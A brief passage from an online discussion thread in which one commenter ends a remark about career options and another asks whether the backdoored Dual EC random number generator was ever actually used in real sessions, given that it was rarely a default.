           | money in, if you can even get a job. Otherwise you can slide
           | into stats or some applied field and do some consulting or
           | something.
        
       | mindslight wrote:
       | Was this modified Dual EC ever used for actual sessions? It's my
       | recollection that programs offered Dual EC as an option, but
       | never the default one. And nobody enabled it because it was slow,
       | and had little advantage. But perhaps that was different with NSA
       | mandating government use standards?
        
       ___________________________________________________________________
       (page generated 2021-09-03 23:03 UTC)